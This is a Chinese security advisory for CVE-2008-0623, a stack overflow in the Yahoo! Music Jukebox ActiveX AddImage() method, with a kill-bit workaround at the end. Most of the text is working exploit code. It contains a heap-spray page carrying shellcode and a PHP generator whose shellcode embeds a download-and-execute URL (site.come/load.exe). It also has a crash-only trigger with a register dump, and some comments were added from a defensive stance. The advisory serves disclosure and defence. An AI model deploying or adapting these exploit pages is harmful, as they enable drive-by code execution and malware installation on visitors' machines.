Yahoo! Music Jukebox datagrid.dll ActiveX控件AddImage函数远程栈溢出漏洞

发布日期:2008-02-04
更新日期:2008-02-22

受影响系统:
Yahoo! Music Jukebox 2.2
描述:
BUGTRAQ  ID: 27590
CVE(CAN) ID: CVE-2008-0623

Yahoo! Music Jukebox是一款音乐编辑、管理、刻录软件。

Yahoo! Music Jukebox的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。

Yahoo! Music Jukebox所安装的YMP DataGrid ActiveX控件(datagrid.dll)没有正确地处理传送给AddImage()方法的输入参数,如果用户受骗访问了恶意站点并向该参数传送了超长字符串的话,就可能触发栈溢出,导致执行任意指令。

<*来源:Krystian Kloskowski (h07@interia.pl)
  
  链接:http://secunia.com/advisories/28757/
        http://www.kb.cert.org/vuls/id/101676
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!--
    Yahoo! Music Jukebox 2.2 AddImage() ActiveX BOF

    Discovered by Krystian Kloskowski - h07@interia.pl

    Written by exceed (code ripped from here and there...)

    Tested on Windows XP SP3 English / IE6 SP3 / datagrid.dll v2.2.2.56
-->

<html>
<object classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"
id="target"></OBJECT>

<SCRIPT language="JavaScript">
// HeapSpray - execute calculator (calc.exe)
//
// Reviewer notes (defender/educator stance):
//  - This is a 2008-era IE6 heap spray followed by the AddImage() overflow
//    trigger on the last line.  Setting the kill bit for
//    {5F810AFC-BB5F-4416-BE63-E01DD117BD6C} (see the workaround section of
//    this advisory) stops IE from instantiating the control, so the
//    AddImage() call below never reaches datagrid.dll.
//  - Implicit globals (no `var`) and the missing semicolon on `slackspace`
//    are left exactly as in the original PoC; they are not part of the bug.
//
// Payload bytes, %u-escaped as little-endian UTF-16 units.  The header
// comment says it launches calc.exe; nothing on this page verifies that.
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                     "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                     "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                     "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                     "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                     "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                     "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                     "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                     "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                     "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                     "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                     "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                     "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                     "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                     "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                     "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                     "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                     "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                     "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                     "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                     "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                     "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                     "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                     "%u314e%u7475%u7038%u7765%u4370");

// Two 0x9090 units.  0x90 is the x86 single-byte NOP, so each spray block
// is presumably a NOP run ending in the payload — the conventional layout.
bigblock = unescape("%u9090%u9090");
// Space reserved at the front of every block (the PoC's value for the JS
// string header; not verifiable from here).
headersize = 20;
slackspace = headersize+shellcode.length
// Double bigblock until it can cover slackspace, then cut the two pieces
// used to pad each block.
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
// Grow each block to just under 0x40000 UTF-16 units.
while(block.length+slackspace<0x40000) block = block+block+fillblock;

// Keep 400 copies of block+shellcode alive so they stay resident on the
// process heap for the duration of the trigger below.
memory = new Array();
for (i=0;i<400;i++) memory[i] = block + shellcode;

// Trigger: a string of 0x0A0A units padded to at least 340 UTF-16 units,
// prefixed with "http://", is passed as the first argument of AddImage().
// Per the advisory text, the control copies this argument into a fixed-size
// stack buffer without a length check; the 340-unit length is what every
// PoC on this page uses.
var buffer =  unescape("%u0A0A%u0A0A");
while (buffer.length< 340) buffer+=unescape("%u0A0A%u0A0A");
target.AddImage("http://"+buffer,1);

</script>
</html>



<?php

    // 0x48k-ymj by ...
    // based on /5043
    // Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>


    function unescape($s){
        $res=strtoupper(bin2hex($s));
        $g = round(strlen($res)/4);
        if ($g != (strlen($res)/4))$res.="00";
        $out = "";
        for ($i=0; $i<strlen($res);$i+=4)$out.="%u".substr($res, $i+2, 2).substr($res, $i, 2);
        return $out;
    }

    // Emits a second PoC page using the same CLSID.  The JavaScript inside
    // the string sprays the heap toward 0x0c0c0c0c (gsc()/gss()) and then
    // makes the same AddImage("http://" + <340-unit string>, 1) call inside a
    // try/catch.  The %u payload string is completed at run time by the PHP
    // helper above, which appends unescape("http://site.come/load.exe") — what
    // looks like a placeholder download URL; the PoC gives no further detail
    // on the payload and none is asserted here.
    // Defensive note: the kill bit for {5F810AFC-BB5F-4416-BE63-E01DD117BD6C}
    // listed in this advisory's workaround section blocks instantiation of the
    // <object>, so neither the spray nor the AddImage() call has any effect.
    echo '
        <html>
        <body>
        <object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"></object>
        <script language="JavaScript">

            function gsc(){
                var hsta = 0x0c0c0c0c;
                var plc = unescape("%u4343%u4343"+
                "%u0feb%u335b%u66c9%u80b9%u8001%uef33"+
                "%ue243%uebfa%ue805%uffec%uffff%u8b7f"+
                "%udf4e%uefef%u64ef%ue3af%u9f64%u42f3"+
                "%u9f64%u6ee7%uef03%uefeb%u64ef%ub903"+
                "%u6187%ue1a1%u0703%uef11%uefef%uaa66"+
                "%ub9eb%u7787%u6511%u07e1%uef1f%uefef"+
                "%uaa66%ub9e7%uca87%u105f%u072d%uef0d"+
                "%uefef%uaa66%ub9e3%u0087%u0f21%u078f"+
                "%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96"+
                "%u0757%uef29%uefef%uaa66%uaffb%ud76f"+
                "%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef"+
                "%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba"+
                "%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0"+
                "%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c"+
                "%u66bf%ucfaa%u1087%uefef%ubfef%uaa64"+
                "%u85fb%ub6ed%uba64%u07f7%uef8e%uefef"+
                "%uaaec%u28cf%ub3ef%uc191%u288a%uebaf"+
                "%u8a97%uefef%u9a10%u64cf%ue3aa%uee85"+
                "%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8"+
                "%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf"+
                "%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc"+
                "%uefef%uef85%u9a10%u64cf%ue7aa%ued85"+
                "%u64b6%uf7ba%uff07%uefef%u85ef%u6410"+
                "%uffaa%uee85%u64b6%uf7ba%uef07%uefef"+
                "%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec"+
                "%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10"+
                "%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+
                "%u64d3%uf19b%uec97%ub91c%u9964%ueccf"+
                "%udc1c%ua626%u42ae%u2cec%udcb9%ue019"+
                "%uff51%u1dd5%ue79b%u212e%uece2%uaf1d"+
                "%u1e04%u11d4%u9ab1%ub50a%u0464%ub564"+
                "%ueccb%u8932%ue364%u64a4%uf3b5%u32ec"+
                "%ueb64%uec64%ub12a%u2db2%uefe7%u1b07"+
                "%u1011%uba10%ua3bd%ua0a2%uefa1"+
                "'.unescape("http://site.come/load.exe").'");
                var hbs=0x400000;
                var pls=plc.length*2;
                var sss=hbs-(pls+0x38);
                var ss=unescape("%u0c0c%u0c0c");
                ss=gss(ss,sss);
                hbs=(hsta-0x400000)/hbs;
                for(i=0;i<hbs;i++)m[i]=ss+plc;
            }
            function gss(ss,sss){
                while(ss.length<sss*2)ss+=ss;
                ss=ss.substring(0,sss);
                return ss;
            }
            var m=new Array();
            gsc();
            try{
                var tmp=gss(unescape("%u0c0c%u0c0c"),340);
                obj.AddImage("http://"+tmp,1);
            }catch(e){}
        </script>
        </body>
        </html>
    ';

?>



<!--
Yahoo! Music Jukebox 2.2 AddImage() ActiveX 0day Remote Buffer Overflow PoC Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Product homepage: http://music.yahoo.com/jukebox/
Tested on:..
- Yahoo! Music Jukebox (2.2.2.056)
- MS IE 6

Details:..

----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=03EC1370: BF 37 90 7C 58 14 EC 03-9C FF FB 03 74 14 EC 03
EBP=03EC1390: 40 14 EC 03 8B 37 90 7C-58 14 EC 03 9C FF FB 03
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              --> N/A

Just for fun ;]
-->

<object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"></object>

<script>

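function makebuf(payload, len) {
    // Repeats `payload` until it is at least 2*len UTF-16 units long and
    // returns the first `len` units of the result.
    //
    // payload: string used as the repeating unit.
    // len:     number of UTF-16 code units wanted.
    // Returns "" for an empty payload or a non-positive len.  The original
    // looped forever on an empty payload, because "" never grows when
    // concatenated with itself; the guard makes that case terminate.
    if (payload.length === 0 || len <= 0) return "";
    var grown = payload;
    while (grown.length < len * 2) grown += grown;
    return grown.substring(0, len);
}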

// Crash-only proof of concept (no payload): the method name is looked up
// dynamically on the <object>, and the argument is 340 UTF-16 units of
// 0x4141 ("AAAA") behind "http://".  The register dump in the comment above
// (EIP=41414141, ECX=41414141) is consistent with that input overwriting a
// saved return address, which is the evidence for the stack overflow the
// advisory describes.
var target = "AddImage";
var payload = unescape("%u4141%u4141");
var len = 340
var tmp = makebuf(payload, len);
// `obj` is the <object> element above with the vulnerable CLSID; the kill
// bit from the advisory's workaround section prevents it from loading, so
// this call then fails before any control code runs.
obj[target]('http://'+tmp, 1);

</script>

建议:
临时解决方法:

* 在IE中禁用有漏洞的ActiveX控件,为以下CLSID设置kill bit:

{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}

或者将以下文本保存为.REG文件并导入:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5F810AFC-BB5F-4416-BE63-E01DD117BD6C}]
"Compatibility Flags"=dword:00000400

厂商补丁:

Yahoo!
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://music.yahoo.com/jukebox/
